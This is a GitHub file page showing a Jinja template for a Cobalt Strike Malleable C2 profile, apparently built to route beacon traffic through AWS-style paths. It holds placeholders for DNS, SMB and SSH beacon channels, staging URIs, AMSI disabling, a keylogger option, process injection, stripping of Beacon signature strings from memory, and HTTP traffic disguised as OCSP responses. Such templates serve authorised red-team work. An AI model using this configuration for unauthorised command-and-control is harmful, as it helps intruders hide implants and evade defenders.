-
Notifications
You must be signed in to change notification settings - Fork 8
/
c2profile_template_awsyun.jinja
300 lines (256 loc) · 13.4 KB
/
c2profile_template_awsyun.jinja
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
################################################
# Cobalt Strike Malleable C2 Profile
# Version: Cobalt Strike {{ version }}
# Date : {{ timestamp }}
################################################
## Profile Name
################################################
set sample_name "{{ sample_name }}";
################################################
## Sleep Times
################################################
set sleeptime "{{ sleeptime }}";
set jitter "{{ jitter }}";
################################################
## Server Response Size jitter
################################################
set data_jitter "{{ data_jitter }}"; # Append random-length string (up to data_jitter value) to http-get and http-post server output.
################################################
## HTTP Client Header Removal
################################################
# set headers_remove "{{ headers_remove }}"; # Comma-separated list of HTTP client headers to remove from Beacon C2.
################################################
## Beacon User-Agent
################################################
set useragent "{{ useragent }}";
################################################
## SSL CERTIFICATE
################################################
https-certificate { # Simple self signed certificate data
set C "{{ https_certificate_C }}";
set CN "{{ https_certificate_CN }}";
set O "{{ https_certificate_O }}";
set OU "{{ https_certificate_OU }}";
set validity "{{ https_certificate_V }}";
}
################################################
## Task and Proxy Max Size
################################################
#set tasks_max_size "{{ tasks_max_size }}";
#set tasks_proxy_max_size "{{ tasks_proxy_max_size }}";
#set tasks_dns_proxy_max_size "{{ tasks_dns_proxy_max_size }}";
################################################
## TCP Beacon
################################################
set tcp_port "{{ tcp_port }}"; # TCP beacion listen port
set tcp_frame_header "{{ tcp_frame_header }}"; # Prepend header to TCP Beacon messages
################################################
## SMB beacons
################################################
set pipename "{{ smb_pipename }}"; # Name of pipe for SSH sessions. Each # is replaced with a random hex value.
set pipename_stager "{{ smb_pipename_stager }}"; # Name of pipe to use for SMB Beacon's named pipe stager. Each # is replaced with a random hex value.
set smb_frame_header "{{ smb_frame_header }}"; # Prepend header to SMB Beacon messages
################################################
## DNS beacons
################################################
dns-beacon {
# Options moved into "dns-beacon" group in version 4.3
set dns_idle "{{ dns_beacon_dns_idle }}"; # IP address used to indicate no tasks are available to DNS Beacon; Mask for other DNS C2 values
set dns_max_txt "{{ dns_beacon_dns_max_txt }}"; # Maximum length of DNS TXT responses for tasks
set dns_sleep "{{ dns_beacon_dns_sleep }}"; # Force a sleep prior to each individual DNS request. (in milliseconds)
set dns_ttl "{{ dns_beacon_dns_ttl }}"; # TTL for DNS replies
set maxdns "{{ dns_beacon_maxdns }}"; # Maximum length of hostname when uploading data over DNS (0-255)
set dns_stager_prepend ".{{ dns_beacon_dns_stager_prepend }}"; # Maximum length of hostname when uploading data over DNS (0-255)
set dns_stager_subhost ".{{ dns_beacon_dns_stager_subhost}}"; # Subdomain used by DNS TXT record stager.
set beacon "{{ dns_beacon_beacon }}"; # 8 Char max recommended. DNS subhost prefix
set get_A "{{ dns_beacon_get_A }}"; # 8 Char max recommended. DNS subhost prefix
set get_AAAA "{{ dns_beacon_get_AAAA }}"; # 8 Char max recommended. DNS subhost prefix
set get_TXT "{{ dns_beacon_get_TXT }}"; # 8 Char max recommended. DNS subhost prefix
set put_metadata "{{ dns_beacon_put_metadata }}"; # 8 Char max recommended. DNS subhost prefix
set put_output "{{ dns_beacon_put_output }}"; # 8 Char max recommended. DNS subhost prefix
set ns_response "{{ dns_beacon_ns_response }}"; # How to process NS Record requests. "drop" does not respond to the request (default), "idle" responds with A record for IP address from "dns_idle", "zero" responds with A record for 0.0.0.0
}
################################################
## SSH beacons
################################################
set ssh_banner "{{ ssh_banner }}"; # SSH client banner
set ssh_pipename "{{ ssh_pipename }}"; # Name of pipe for SSH sessions. Each # is replaced with a random hex value.
################################################
## Staging process
################################################
set host_stage "{{ host_stage }}";
http-stager { # Reference: https://www.cobaltstrike.com/help-malleable-c2
set uri_x86 "/{{ awsstage }}/{{ http_stager_uri_x86 }}"; # URI for x86 staging
set uri_x64 "/{{ awsstage }}/{{ http_stager_uri_x64 }}"; # URI for x64 staging
server {
header "Server" "{{ http_stager_server_header1 }}";
header {{ http_stager_server_header2 }};
header {{ http_stager_server_header3 }};
header {{ http_stager_server_header4 }};
header {{ http_stager_server_header5 }};
output {
prepend "{{ http_stager_server_prepend }}";
append "{{ http_stager_server_append }}";
print;
}
}
client {
header "Accept" "{{ http_get_client_header1 }}";
header "Accept-Language" "{{ http_get_client_header2 }}";
header "Accept-Encoding" "{{ http_get_client_header3 }}";
}
}
################################################
## Post Exploitation
################################################
post-ex { # Reference: https://www.cobaltstrike.com/help-malleable-postex
set spawnto_x86 "{{ post_ex_spawnto_x86 }}";
set spawnto_x64 "{{ post_ex_spawnto_x64 }}";
set obfuscate "{{ post_ex_obfuscate }}";
set smartinject "{{ post_ex_smartinject }}";
set amsi_disable "{{ post_ex_amsi_disable }}";
set pipename "{{ post_ex_pipename }}";
set keylogger "{{ post_ex_keylogger }}"; # options are GetAsyncKeyState or SetWindowsHookEx
#set thread_hint ""; # specify as module!function+0x##
}
################################################
## Memory Indicators
################################################
stage { # https://www.cobaltstrike.com/help-malleable-postex
# allocator and RWX settings (Note: HealAlloc uses RXW)
{{ allocator_settings }}
set magic_mz_x86 "{{ stage_magic_mz_x86 }}";
set magic_mz_x64 "{{ stage_magic_mz_x64 }}";
set magic_pe "{{ stage_magic_pe }}";
set stomppe "{{ stage_stomppe }}";
set obfuscate "{{ stage_obfuscate }}"; # review sleepmask and UDRL considerations for obfuscate
set cleanup "{{ stage_cleanup }}";
set sleep_mask "{{ stage_sleep_mask}}";
set smartinject "{{ stage_smartinject }}";
set checksum "{{ stage_checksum }}";
set compile_time "{{ stage_compile_time }}";
set entry_point "{{ stage_entry_point }}";
set image_size_x86 "{{ stage_image_size_x86 }}";
set image_size_x64 "{{ stage_image_size_x64 }}";
set name "{{ stage_name }}";
set rich_header "{{ stage_rich_header }}";
## WARNING: Module stomping
# set module_x86 "{{ stage_module_x86 }}"; # Ask the x86 ReflectiveLoader to load the specified library and overwrite its space instead of allocating memory with VirtualAlloc.
# set module_x64 "{{ stage_module_x64 }}"; # Same as module_x86; affects x64 loader
# The transform-x86 and transform-x64 blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and strrep.
transform-x86 { # blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and strrep.
prepend "{{ stage_transform_x86_prepend }}"; # prepend nops
strrep "ReflectiveLoader" "{{ stage_transform_x86_strrep1 }}";
strrep "This program cannot be run in DOS mode" ""; # Remove this text
strrep "beacon.dll" ""; # Remove this text
}
transform-x64 { #blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and strrep.
prepend "{{ stage_transform_x64_prepend }}"; # prepend nops
strrep "ReflectiveLoader" "{{ stage_transform_x64_strrep1 }}";
strrep "beacon.x64.dll" ""; # Remove this text in the Beacon DLL
}
stringw "{{ sample_name }}"; # Add profile name to tag payloads to this profile
}
################################################
## Process Injection
################################################
process-inject { # Reference: https://www.cobaltstrike.com/help-malleable-postex
set allocator "{{ process_inject_allocator }}"; # Options: VirtualAllocEx, NtMapViewOfSection
set min_alloc "{{ process_inject_min_alloc }}"; # Minimum amount of memory to request for injected content
set startrwx "false"; # Use RWX as initial permissions for injected content. Alternative is RW.
# review sleepmask and UDRL considerations for userwx
set userwx "false"; # Use RWX as final permissions for injected content. Alternative is RX.
transform-x86 {
# Make sure that prepended data is valid code for the injected content's architecture (x86, x64). The c2lint program does not have a check for this.
prepend "{{ process_inject_transform_x86_prepend }}";
append "{{ process_inject_transform_x86_append }}";
}
transform-x64 {
# Make sure that prepended data is valid code for the injected content's architecture (x86, x64). The c2lint program does not have a check for this.
prepend "{{ process_inject_transform_x64_prepend }}";
append "{{ process_inject_transform_x64_append }}";
}
execute {
# The execute block controls the methods Beacon will use when it needs to inject code into a process. Beacon examines each option in the execute block, determines if the option is usable for the current context, tries the method when it is usable, and moves on to the next option if code execution did not happen.
{{ process_inject_execute }}
}
}
################################################
## HTTP Headers
################################################
http-config { # The http-config block has influence over all HTTP responses served by Cobalt Strike’s web server.
set headers "{{ http_config_headers }}";
header "Server" "{{ http_config_header_server }}";
header "Keep-Alive" "timeout=10, max=100";
header "Connection" "Keep-Alive";
# Use this option if your teamserver is behind a redirector
set trust_x_forwarded_for "{{ http_config_trust_x_forwarded_for }}";
# Block Specific User Agents with a 404 (added in 4.3)
set block_useragents "{{ http_config_block_useragents }}";
# Allow Specific User Agents (added in 4.4);
# allow_useragents ""; (if specified, block_useragents will take precedence)
}
################################################
## HTTP GET
################################################
http-get { # Don't think of this in terms of HTTP POST, as a beacon transaction of pushing data to the server
set uri "/{{ awsstage }}/{{ http_get_uri }}"; # URI used for GET requests
set verb "{{ http_get_verb }}";
client {
header "Accept" "{{ http_get_client_header1 }}";
header "Accept-Language" "{{ http_get_client_header2 }}";
header "Accept-Encoding" "{{ http_get_client_header3 }}";
header "Content-Type" "application/x-www-form-urltrytryd";
header "Host" "{{host}}";
metadata {
base64;
prepend "{{ http_get_client_metadata_prepend }}";
header "Cookie";
}
}
server {
header "Content-Type" "application/ocsp-response";
header "content-transfer-encoding" "binary";
header "Server" "{{ http_get_server_header1 }}";
output {
base64;
prepend "{{ http_get_server_prepend }}";
append "{{ http_get_server_prepend }}";
print;
}
}
}
################################################
## HTTP POST
################################################
http-post { # Don't think of this in terms of HTTP POST, as a beacon transaction of pushing data to the server
set uri "/{{ awsstage }}/{{ http_post_uri }}"; # URI used for POST block.
set verb "{{ http_post_verb }}"; # HTTP verb used in POST block. Can be GET or POST
client {
header "Accept" "{{ http_get_client_header1 }}";
header "Accept-Language" "{{ http_get_client_header2 }}";
header "Accept-Encoding" "{{ http_get_client_header3 }}";
header "Content-Type" "application/x-www-form-urltrytryd";
header "Host" "{{host}}";
id {
base64;
prepend "{{ http_get_client_metadata_prepend }}";
header "Cookie";
}
output {
base64;
print;
}
}
server {
header "Content-Type" "application/ocsp-response";
header "content-transfer-encoding" "binary";
header "Connection" "keep-alive";
output {
base64;
prepend "{{ http_post_server_prepend }}";
append "{{ http_post_server_prepend }}";
print;
}
}
}